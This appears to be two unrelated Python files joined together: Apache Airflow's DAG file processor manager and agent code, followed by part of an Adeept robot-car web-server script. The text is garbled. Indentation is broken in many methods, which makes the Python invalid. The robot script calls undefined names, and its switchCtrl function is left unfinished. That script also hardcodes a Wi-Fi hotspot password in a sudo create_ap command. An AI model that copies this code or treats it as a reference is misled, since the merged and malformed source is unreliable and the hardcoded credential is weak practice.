    Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
    """
    parent_conn, child_conn = multiprocessing.Pipe()
    self._parent_signal_conn = parent_conn
    self._process = multiprocessing.Process(
        target=type(self)._run_processor_manager,
        args=(self._dag_directory,
              self._file_paths,
              self._max_runs,
              self._processor_factory,
              self._processor_timeout,
              child_conn,
              self._async_mode))
    self._process.start()
    self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
    """
    Should only be used when launched DAG file processor manager in sync mode.
    Send agent heartbeat signal to the manager, requesting that it runs one
    processing "loop".
    Call wait_until_finished to ensure that any launched processors have
    finished before continuing
    """
    if not self._process.is_alive():
        return
    try:
        self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
    except ConnectionError:
        # If the pipe broke because the manager died, the failure is
        # noticed and the manager restarted when harvest_simple_dags
        # calls _heartbeat_manager.
        pass
def wait_until_finished(self):
    """Drain the signal pipe until the manager reports a finished parsing loop.

    Sync-mode companion to heartbeat(): returns as soon as a DagParsingStat
    arrives, or when the pipe is empty/closed.
    """
    while self._parent_signal_conn.poll():
        try:
            result = self._parent_signal_conn.recv()
        except EOFError:
            break
        self._process_message(result)
        if isinstance(result, DagParsingStat):
            # In sync mode we don't send this message from the Manager
            # until all the running processors have finished
            return
@staticmethod
def _run_processor_manager(dag_directory,
                           file_paths,
                           max_runs,
                           processor_factory,
                           processor_timeout,
                           signal_conn,
                           async_mode):
    """Entry point of the manager subprocess: prepare its environment and
    run a DagFileProcessorManager until it exits.
    """
    # Make this process start as a new process group - that makes it easy
    # to kill all sub-process of this at the OS-level, rather than having
    # to iterate the child processes
    os.setpgid(0, 0)
    setproctitle("airflow scheduler -- DagFileProcessorManager")
    # Reload configurations and settings to avoid collision with parent process.
    # Because this process may need custom configurations that cannot be shared,
    # e.g. RotatingFileHandler. And it can cause connection corruption if we
    # do not recreate the SQLA connection pool.
    os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
    os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
    # Replicating the behavior of how logging module was loaded
    # in logging_config.py
    reload_module(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
    reload_module(airflow.settings)
    airflow.settings.initialize()
    del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
    processor_manager = DagFileProcessorManager(dag_directory,
                                                file_paths,
                                                max_runs,
                                                processor_factory,
                                                processor_timeout,
                                                signal_conn,
                                                async_mode)
    processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
    @property
    def file_paths(self):
        # Latest list of DAG definition files, as reported by the manager.
        return self._file_paths
    @property
    def done(self):
        # True once the manager reported that max_runs has been reached.
        return self._done
    @property
    def all_files_processed(self):
        # True when every known file has a recorded finish time.
        return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
    """
    Given a list of DAG definition files, this kicks off several processors
    in parallel to process them and put the results to a multiprocessing.Queue
    for DagFileProcessorAgent to harvest. The parallelism is limited and as the
    processors finish, more are launched. The files are processed over and
    over again, but no more often than the specified interval.
    :param dag_directory: Directory where DAG definitions are kept. All
        files in file_paths should be under this directory
    :type dag_directory: unicode
    :param file_paths: list of file paths that contain DAG definitions
    :type file_paths: list[unicode]
    :param max_runs: The number of times to parse and schedule each file. -1
        for unlimited.
    :type max_runs: int
    :param processor_factory: function that creates processors for DAG
        definition files. Arguments are (dag_definition_path)
    :type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
    :param processor_timeout: How long to wait before timing out a DAG file processor
    :type processor_timeout: timedelta
    :param signal_conn: connection to communicate signal with processor agent.
    :type signal_conn: airflow.models.connection.Connection
    :param async_mode: whether to start the manager in async mode
    :type async_mode: bool
    """
    def __init__(self,
                 dag_directory,
                 file_paths,
                 max_runs,
                 processor_factory,
                 processor_timeout,
                 signal_conn,
                 async_mode=True):
        """Read scheduler configuration and initialize all bookkeeping state."""
        self._file_paths = file_paths
        # Paths waiting to be handed to a processor.
        self._file_path_queue = []
        self._dag_directory = dag_directory
        self._max_runs = max_runs
        self._processor_factory = processor_factory
        self._signal_conn = signal_conn
        self._async_mode = async_mode
        self._parallelism = conf.getint('scheduler', 'max_threads')
        # SQLite cannot handle concurrent writers, so force a single processor.
        if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
            self.log.warning(
                "Because we cannot use more than 1 thread (max_threads = {}) "
                "when using sqlite. So we set parallelism to 1.".format(self._parallelism)
            )
            self._parallelism = 1
        # Parse and schedule each file no faster than this interval.
        self._file_process_interval = conf.getint('scheduler',
                                                  'min_file_process_interval')
        # How often to print out DAG file processing stats to the log. Default to
        # 30 seconds.
        self.print_stats_interval = conf.getint('scheduler',
                                                'print_stats_interval')
        # How many seconds do we wait for tasks to heartbeat before mark them as zombies.
        self._zombie_threshold_secs = (
            conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
        # Map from file path to the processor
        self._processors = {}
        # Number of times heartbeat() has run; compared against max_runs.
        self._heartbeat_count = 0
        # Map from file path to stats about the file (Dict[str, DagFileStat])
        self._file_stats = {}
        self._last_zombie_query_time = None
        # Last time that the DAG dir was traversed to look for files
        self.last_dag_dir_refresh_time = timezone.utcnow()
        # Last time stats were printed; initialized far in the past so the
        # first loop iteration prints immediately.
        self.last_stat_print_time = timezone.datetime(2000, 1, 1)
        # TODO: Remove magic number
        self._zombie_query_interval = 10
        self._zombies = []
        # How long to wait before timing out a process to parse a DAG file
        self._processor_timeout = processor_timeout
        # How often to scan the DAGs directory for new files. Default to 5 minutes.
        self.dag_dir_list_interval = conf.getint('scheduler',
                                                 'dag_dir_list_interval')
        self._log = logging.getLogger('airflow.processor_manager')
        # Clean up child processors on interrupt/termination.
        signal.signal(signal.SIGINT, self._exit_gracefully)
        signal.signal(signal.SIGTERM, self._exit_gracefully)
    def _exit_gracefully(self, signum, frame):
        """
        Helper method to clean up DAG file processors to avoid leaving orphan processes.

        Installed as the SIGINT/SIGTERM handler in __init__; terminates all
        child processors, then exits this process with a success status.
        """
        self.log.info("Exiting gracefully upon receiving signal %s", signum)
        # Ask processors to stop first, then force-kill any stragglers.
        self.terminate()
        self.end()
        self.log.debug("Finished terminating DAG processors.")
        sys.exit(os.EX_OK)
    def start(self):
        """
        Use multiple processes to parse and generate tasks for the
        DAGs in parallel. By processing them in separate processes,
        we can get parallelism and isolation from potentially harmful
        user code.

        This is the manager's main loop: it runs until terminated or until
        every file has been parsed max_runs times.
        """
        # Start a new process group
        os.setpgid(0, 0)
        self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
        self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
        self.log.info(
            "Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
        )
        # In sync mode we want timeout=None -- wait forever until a message is received
        if self._async_mode:
            poll_time = 0.0
        else:
            poll_time = None
        # Used to track how long it takes us to get once around every file in the DAG folder.
        self._parsing_start_time = timezone.utcnow()
        while True:
            loop_start_time = time.time()
            # Handle any control signal sent by the agent before parsing.
            if self._signal_conn.poll(poll_time):
                agent_signal = self._signal_conn.recv()
                self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
                if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
                    self.terminate()
                    break
                elif agent_signal == DagParsingSignal.END_MANAGER:
                    self.end()
                    sys.exit(os.EX_OK)
                elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
                    # continue the loop to parse dags
                    pass
            elif not self._async_mode:
                # In "sync" mode we don't want to parse the DAGs until we
                # are told to (as that would open another connection to the
                # SQLite DB which isn't a good practice
                continue
            self._refresh_dag_dir()
            self._find_zombies()
            # Launch/collect processors and stream any finished DAGs back.
            simple_dags = self.heartbeat()
            for simple_dag in simple_dags:
                self._signal_conn.send(simple_dag)
            if not self._async_mode:
                self.log.debug(
                    "Waiting for processors to finish since we're using sqlite")
                # Wait until the running DAG processors are finished before
                # sending a DagParsingStat message back. This means the Agent
                # can tell we've got to the end of this iteration when it sees
                # this type of message
                self.wait_until_finished()
                # Collect anything else that has finished, but don't kick off any more processors
                simple_dags = self.collect_results()
                for simple_dag in simple_dags:
                    self._signal_conn.send(simple_dag)
            self._print_stat()
            all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
            max_runs_reached = self.max_runs_reached()
            # Always end the iteration with a stat message so the agent can
            # update its metadata (and, in sync mode, detect loop completion).
            dag_parsing_stat = DagParsingStat(self._file_paths,
                                              max_runs_reached,
                                              all_files_processed,
                                              )
            self._signal_conn.send(dag_parsing_stat)
            if max_runs_reached:
                self.log.info("Exiting dag parsing loop as all files "
                              "have been processed %s times", self._max_runs)
                break
            if self._async_mode:
                # Throttle the loop to at most one iteration per second.
                loop_duration = time.time() - loop_start_time
                if loop_duration < 1:
                    poll_time = 1 - loop_duration
                else:
                    poll_time = 0.0
    def _refresh_dag_dir(self):
        """
        Refresh file paths from dag dir if we haven't done it for too long.

        Re-lists the DAG directory at most once per dag_dir_list_interval,
        prunes state for deleted files, and clears stale import errors and
        serialized-DAG records.
        """
        now = timezone.utcnow()
        elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
        if elapsed_time_since_refresh > self.dag_dir_list_interval:
            # Build up a list of Python files that could contain DAGs
            self.log.info("Searching for files in %s", self._dag_directory)
            self._file_paths = list_py_file_paths(self._dag_directory)
            self.last_dag_dir_refresh_time = now
            self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
            # Drop queue entries, processors and stats for files that vanished.
            self.set_file_paths(self._file_paths)
            try:
                self.log.debug("Removing old import errors")
                self.clear_nonexistent_import_errors()
            except Exception:
                # Best-effort cleanup; never let it break the parsing loop.
                self.log.exception("Error removing old import errors")
            if STORE_SERIALIZED_DAGS:
                # Imported here to avoid a circular import at module load time.
                from airflow.models.serialized_dag import SerializedDagModel
                from airflow.models.dag import DagModel
                SerializedDagModel.remove_deleted_dags(self._file_paths)
                DagModel.deactivate_deleted_dags(self._file_paths)
            if conf.getboolean('core', 'store_dag_code', fallback=False):
                from airflow.models.dagcode import DagCode
                DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if self.print_stats_interval > 0 and (
timezone.utcnow() -
self.last_stat_print_time).total_seconds() > self.print_stats_interval:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
    @provide_session
    def clear_nonexistent_import_errors(self, session):
        """
        Clears import errors for files that no longer exist.

        :param session: session for ORM operations (injected by
            @provide_session when not passed explicitly)
        :type session: sqlalchemy.orm.session.Session
        """
        query = session.query(errors.ImportError)
        if self._file_paths:
            # Keep errors only for files we no longer track.
            query = query.filter(
                ~errors.ImportError.filename.in_(self._file_paths)
            )
        # 'fetch' keeps in-memory session state consistent with the bulk delete.
        query.delete(synchronize_session='fetch')
        session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time).total_seconds() if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
    @property
    def file_paths(self):
        # Current list of DAG definition files being managed.
        return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for file_path, processor in self._processors.items():
while not processor.done:
time.sleep(0.1)
    def collect_results(self):
        """
        Collect the result from any finished DAG processors

        Also kills timed-out processors, records per-file stats for each
        finished one, and removes finished processors from the running map.

        :return: a list of SimpleDags that were produced by processors that
            have finished since the last time this was called
        :rtype: list[airflow.utils.dag_processing.SimpleDag]
        """
        self._kill_timed_out_processors()
        finished_processors = {}
        """:type : dict[unicode, AbstractDagFileProcessor]"""
        running_processors = {}
        """:type : dict[unicode, AbstractDagFileProcessor]"""
        for file_path, processor in self._processors.items():
            if processor.done:
                self.log.debug("Processor for %s finished", file_path)
                Stats.decr('dag_processing.processes')
                now = timezone.utcnow()
                finished_processors[file_path] = processor
                # result is None when the child exited abnormally; record
                # 0 DAGs and -1 import errors so that shows up in the stats.
                stat = DagFileStat(
                    len(processor.result[0]) if processor.result is not None else 0,
                    processor.result[1] if processor.result is not None else -1,
                    now,
                    (now - processor.start_time).total_seconds(),
                    self.get_run_count(file_path) + 1,
                )
                self._file_stats[file_path] = stat
            else:
                running_processors[file_path] = processor
        self._processors = running_processors
        self.log.debug("%s/%s DAG parsing processes running",
                       len(self._processors), self._parallelism)
        self.log.debug("%s file paths queued for processing",
                       len(self._file_path_queue))
        # Collect all the DAGs that were found in the processed files
        simple_dags = []
        for file_path, processor in finished_processors.items():
            if processor.result is None:
                self.log.error(
                    "Processor for %s exited with return code %s.",
                    processor.file_path, processor.exit_code
                )
            else:
                for simple_dag in processor.result[0]:
                    simple_dags.append(simple_dag)
        return simple_dags
    def heartbeat(self):
        """
        This should be periodically called by the manager loop. This method will
        kick off new processes to process DAG definition files and read the
        results from the finished processors.

        :return: a list of SimpleDags that were produced by processors that
            have finished since the last time this was called
        :rtype: list[airflow.utils.dag_processing.SimpleDag]
        """
        simple_dags = self.collect_results()
        # Generate more file paths to process if we processed all the files
        # already.
        if len(self._file_path_queue) == 0:
            # The queue draining marks the end of one pass over the DAG folder.
            self.emit_metrics()
            self._parsing_start_time = timezone.utcnow()
            # If the file path is already being processed, or if a file was
            # processed recently, wait until the next batch
            file_paths_in_progress = self._processors.keys()
            now = timezone.utcnow()
            file_paths_recently_processed = []
            for file_path in self._file_paths:
                last_finish_time = self.get_last_finish_time(file_path)
                if (last_finish_time is not None and
                    (now - last_finish_time).total_seconds() <
                        self._file_process_interval):
                    file_paths_recently_processed.append(file_path)
            # Files that have already hit max_runs are excluded from re-queueing.
            files_paths_at_run_limit = [file_path
                                        for file_path, stat in self._file_stats.items()
                                        if stat.run_count == self._max_runs]
            files_paths_to_queue = list(set(self._file_paths) -
                                        set(file_paths_in_progress) -
                                        set(file_paths_recently_processed) -
                                        set(files_paths_at_run_limit))
            for file_path, processor in self._processors.items():
                self.log.debug(
                    "File path %s is still being processed (started: %s)",
                    processor.file_path, processor.start_time.isoformat()
                )
            self.log.debug(
                "Queuing the following files for processing:\n\t%s",
                "\n\t".join(files_paths_to_queue)
            )
            # Seed an empty stats record for files queued for the first time.
            for file_path in files_paths_to_queue:
                if file_path not in self._file_stats:
                    self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
            self._file_path_queue.extend(files_paths_to_queue)
        # Start more processors if we have enough slots and files to process
        while (self._parallelism - len(self._processors) > 0 and
                len(self._file_path_queue) > 0):
            file_path = self._file_path_queue.pop(0)
            processor = self._processor_factory(file_path, self._zombies)
            Stats.incr('dag_processing.processes')
            processor.start()
            self.log.debug(
                "Started a process (PID: %s) to generate tasks for %s",
                processor.pid, file_path
            )
            self._processors[file_path] = processor
        # Update heartbeat count.
        self._heartbeat_count += 1
        return simple_dags
    @provide_session
    def _find_zombies(self, session):
        """
        Find zombie task instances, which are tasks haven't heartbeated for too long
        and update the current zombie list.

        Queries at most once per _zombie_query_interval seconds; between
        queries the previous zombie list is kept as-is.

        :param session: ORM session injected by @provide_session
        """
        now = timezone.utcnow()
        zombies = []
        if not self._last_zombie_query_time or \
                (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
            # to avoid circular imports
            from airflow.jobs import LocalTaskJob as LJ
            self.log.info("Finding 'running' jobs without a recent heartbeat")
            TI = airflow.models.TaskInstance
            limit_dttm = timezone.utcnow() - timedelta(
                seconds=self._zombie_threshold_secs)
            self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
            # A zombie is a RUNNING task whose backing job is no longer
            # running, or whose job stopped heartbeating before limit_dttm.
            tis = (
                session.query(TI)
                .join(LJ, TI.job_id == LJ.id)
                .filter(TI.state == State.RUNNING)
                .filter(
                    or_(
                        LJ.state != State.RUNNING,
                        LJ.latest_heartbeat < limit_dttm,
                    )
                ).all()
            )
            self._last_zombie_query_time = timezone.utcnow()
            for ti in tis:
                sti = SimpleTaskInstance(ti)
                self.log.info(
                    "Detected zombie job with dag_id %s, task_id %s, and execution date %s",
                    sti.dag_id, sti.task_id, sti.execution_date.isoformat())
                zombies.append(sti)
        # NOTE: when the query is skipped this resets the list to empty rather
        # than keeping the previous zombies — intentional? TODO confirm.
        self._zombies = zombies
    def _kill_timed_out_processors(self):
        """
        Kill any file processors that timeout to defend against process hangs.

        A processor is considered hung once it has been running longer than
        the configured ``_processor_timeout`` timedelta.
        """
        now = timezone.utcnow()
        for file_path, processor in self._processors.items():
            duration = now - processor.start_time
            if duration > self._processor_timeout:
                self.log.error(
                    "Processor for %s with PID %s started at %s has timed out, "
                    "killing it.",
                    processor.file_path, processor.pid, processor.start_time.isoformat())
                Stats.decr('dag_processing.processes')
                Stats.incr('dag_processing.processor_timeouts')
                # TODO: Remove after Airflow 2.0
                Stats.incr('dag_file_processor_timeouts')
                # The killed processor stays in self._processors until
                # collect_results observes it as done and removes it.
                processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._heartbeat_count < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
    def end(self):
        """
        Kill all child processes on exit since we don't want to leave
        them as orphaned.

        First sends SIGTERM and waits briefly, then SIGKILLs whatever is
        still alive.
        """
        pids_to_kill = self.get_all_pids()
        if len(pids_to_kill) > 0:
            # First try SIGTERM
            this_process = psutil.Process(os.getpid())
            # Only check child processes to ensure that we don't have a case
            # where we kill the wrong process because a child process died
            # but the PID got reused.
            child_processes = [x for x in this_process.children(recursive=True)
                               if x.is_running() and x.pid in pids_to_kill]
            for child in child_processes:
                self.log.info("Terminating child PID: %s", child.pid)
                child.terminate()
            # TODO: Remove magic number
            timeout = 5
            self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
            try:
                psutil.wait_procs(
                    child_processes, timeout=timeout,
                    callback=lambda x: self.log.info('Terminated PID %s', x.pid))
            except psutil.TimeoutExpired:
                self.log.debug("Ran out of time while waiting for processes to exit")
            # Then SIGKILL
            # Re-list survivors: some children may have exited during the wait.
            child_processes = [x for x in this_process.children(recursive=True)
                               if x.is_running() and x.pid in pids_to_kill]
            if len(child_processes) > 0:
                self.log.info("SIGKILL processes that did not terminate gracefully")
                for child in child_processes:
                    self.log.info("Killing child PID: %s", child.pid)
                    child.kill()
                    # Reap the killed child so no zombie is left behind.
                    child.wait()
    def emit_metrics(self):
        """
        Emit metrics about dag parsing summary

        This is called once every time around the parsing "loop" - i.e. after
        all files have been parsed.
        """
        parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
        Stats.gauge('dag_processing.total_parse_time', parse_time)
        Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
        Stats.gauge('dag_processing.import_errors',
                    sum(stat.import_errors for stat in self._file_stats.values()))
        # TODO: Remove before Airflow 2.0
        Stats.gauge('collect_dags', parse_time)
        Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
|
webServer.py | #!/usr/bin/env python3
# File name : server.py
# Production : GWR
# Website : www.adeept.com
# Author : William
# Date : 2020/03/17
import time
import threading
import move
import Adafruit_PCA9685
import os
import info
import RPIservo
import functions
import robotLight
import switch
import socket
#websocket
import asyncio
import websockets
import json
import app
OLED_connection = 1
try:
import OLED
screen = OLED.OLED_ctrl()
screen.start()
screen.screen_show(1, 'ADEEPT.COM')
except:
OLED_connection = 0
print('OLED disconnected')
pass
functionMode = 0
speed_set = 100
rad = 0.5
turnWiggle = 60
scGear = RPIservo.ServoCtrl()
scGear.moveInit()
P_sc = RPIservo.ServoCtrl()
P_sc.start()
T_sc = RPIservo.ServoCtrl()
T_sc.start()
H1_sc = RPIservo.ServoCtrl()
H1_sc.start()
H2_sc = RPIservo.ServoCtrl()
H2_sc.start()
G_sc = RPIservo.ServoCtrl()
G_sc.start()
# modeSelect = 'none'
modeSelect = 'PT'
init_pwm0 = scGear.initPos[0]
init_pwm1 = scGear.initPos[1]
init_pwm2 = scGear.initPos[2]
init_pwm3 = scGear.initPos[3]
init_pwm4 = scGear.initPos[4]
fuc = functions.Functions()
fuc.start()
curpath = os.path.realpath(__file__)
thisPath = "/" + os.path.dirname(curpath)
direction_command = 'no'
turn_command = 'no'
def servoPosInit():
    """Move every servo controller back to its stored initial PWM position."""
    scGear.initConfig(0, init_pwm0, 1)
    P_sc.initConfig(1, init_pwm1, 1)
    T_sc.initConfig(2, init_pwm2, 1)
    # BUGFIX: the original referenced an undefined name `H_sc`, raising
    # NameError whenever this ran. Init slot 3 is assigned to H1_sc here —
    # NOTE(review): confirm against the servo wiring that slot 3 is H1.
    H1_sc.initConfig(3, init_pwm3, 1)
    G_sc.initConfig(4, init_pwm4, 1)
def replace_num(initial, new_num):
    """
    Persist a calibration value by rewriting RPIservo.py in place.

    Any line that starts with ``initial`` (e.g. ``'init_pwm0 = '``) is
    replaced by the prefix followed by ``new_num``; all other lines are
    kept unchanged.

    :param initial: line prefix to match at column 0
    :param new_num: value to write after the prefix
    """
    # BUGFIX: dropped the original `global r` — `r` was never defined or
    # used anywhere, and the declaration served no purpose.
    str_num = str(new_num)
    newline = ""
    with open(thisPath + "/RPIservo.py", "r") as f:
        for line in f.readlines():
            if line.find(initial) == 0:
                line = initial + "%s" % (str_num + "\n")
            newline += line
    with open(thisPath + "/RPIservo.py", "w") as f:
        f.writelines(newline)
def FPV_thread():
    # Start the first-person-view camera capture for the connected client.
    # NOTE(review): `FPV` is never imported in this file and `addr` is a
    # global presumably set when a client connects — confirm both are
    # provided elsewhere before this thread is started.
    global fpv
    fpv=FPV.FPV()
    fpv.capture_thread(addr[0])
def ap_thread():
    # Fall back to hotspot mode: share eth0 over wlan0 as SSID "Adeept"
    # (blocks for as long as create_ap runs, hence its own thread).
    os.system("sudo create_ap wlan0 eth0 Adeept 12345678")
def functionSelect(command_input, response):
    """
    Dispatch a high-level mode command from the client.

    Starts/stops autonomous behaviours (radar scan, colour tracking, motion
    detection, police lights, line tracking, camera stabilisation) on the
    shared function/light controllers. For 'scan' the radar result is written
    into ``response``; other commands mutate device state only.

    NOTE(review): `flask_app` and `RL` are not defined in this part of the
    file — presumably created later during startup; confirm before calling.
    """
    global functionMode
    if 'scan' == command_input:
        if OLED_connection:
            screen.screen_show(5,'SCANNING')
        if modeSelect == 'PT':
            radar_send = fuc.radarScan()
            print(radar_send)
            response['title'] = 'scanResult'
            response['data'] = radar_send
            time.sleep(0.3)
    elif 'findColor' == command_input:
        if OLED_connection:
            screen.screen_show(5,'FindColor')
        if modeSelect == 'PT':
            flask_app.modeselect('findColor')
    elif 'motionGet' == command_input:
        if OLED_connection:
            screen.screen_show(5,'MotionGet')
        flask_app.modeselect('watchDog')
    elif 'stopCV' == command_input:
        # Leave any vision mode and switch every accessory port off.
        flask_app.modeselect('none')
        switch.switch(1,0)
        switch.switch(2,0)
        switch.switch(3,0)
    elif 'police' == command_input:
        if OLED_connection:
            screen.screen_show(5,'POLICE')
        RL.police()
    elif 'policeOff' == command_input:
        RL.pause()
        move.motorStop()
    elif 'automatic' == command_input:
        if OLED_connection:
            screen.screen_show(5,'Automatic')
        if modeSelect == 'PT':
            fuc.automatic()
        else:
            fuc.pause()
    elif 'automaticOff' == command_input:
        fuc.pause()
        move.motorStop()
    elif 'trackLine' == command_input:
        fuc.trackLine()
        if OLED_connection:
            screen.screen_show(5,'TrackLine')
    elif 'trackLineOff' == command_input:
        fuc.pause()
        move.motorStop()
    elif 'steadyCamera' == command_input:
        if OLED_connection:
            screen.screen_show(5,'SteadyCamera')
        # Stabilise the tilt servo around its current position.
        fuc.steady(T_sc.lastPos[2])
    elif 'steadyCameraOff' == command_input:
        fuc.pause()
        move.motorStop()
def switchCtrl(command_input, response):
    """Turn one of the three accessory switch ports on or off per the command text."""
    actions = (('Switch_1_on', 1, 1), ('Switch_1_off', 1, 0),
               ('Switch_2_on', 2, 1), ('Switch_2_off', 2, 0),
               ('Switch_3_on', 3, 1), ('Switch_3_off', 3, 0))
    # First matching token wins, mirroring the original elif chain order.
